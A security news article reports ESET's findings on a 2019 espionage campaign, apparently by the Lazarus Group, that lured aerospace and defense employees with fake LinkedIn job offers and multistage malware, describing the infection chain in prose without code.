Cyber Attackers Use Lucrative Job Offers via Linkedin to Snare Victims
Cyber attackers have used the lure of lucrative job offers via Linkedin to target aerospace and military company employees in Europe and the Middle East.
The attacks, which took place from September to December 2019, used a malware sample named 'Inception.dll' and are believed to be the work of North Korea's Lazarus Group.
"They were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware," said researchers from ESET, who made the discovery. "To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities and impersonated legitimate software and companies. To our knowledge, the malware hasn’t been previously documented."
The researchers believe the primary goal of the operation was espionage. However, in one case, attackers used a business email compromise attack as the final stage of the operation.
"First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account," said the researchers. "Rather than paying the invoice, the customer enquired about the requested sum ... (and) ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side."
Contact was initially made via fictitious job offers using LinkedIn’s messaging feature. The attackers posed as HR people from well-known and credible aerospace and defense industry companies, such as General Dynamics and Collins Aerospace (formerly Rockwell Collins).
Once a successful contact was made, malicious files - disguised as documents pertinent to the job offer - were placed into the online conversation.
The malicious files were sent either via LinkedIn or via (fake) email and OneDrive. Once opened, the (LNK) file started a Command Prompt which opened a remote PDF file in the target’s default browser.
"That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy," said the researchers. "In the background, the Command Prompt created a new folder and copied the WMI Commandline Utility to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied (WMI Commandline Utility)."
Once 'in', the attackers were able to use an arsenal of tools, including custom, multistage malware, and modified versions of open-source tools.
The attackers attempted to remain undetected by disguising files and folders with the names of well-established software and companies (Intel and Skype, to name two), digitally signing some components of their malware, recompiling the Stage 1 malware numerous times throughout the operation and implementing anti-analysis techniques in their custom malware.
Nothing firm linked the attacks to a known threat actor.
"However, said ESET, "the method of targeting, use of fake LinkedIn accounts, development environment, and anti-analysis techniques bore strong resemblance to those used by the Lazarus group."ESET White Paper
. . .
If you want to stay notified of vulnerabilities that affect you, register for a weekly security report customised to your stack.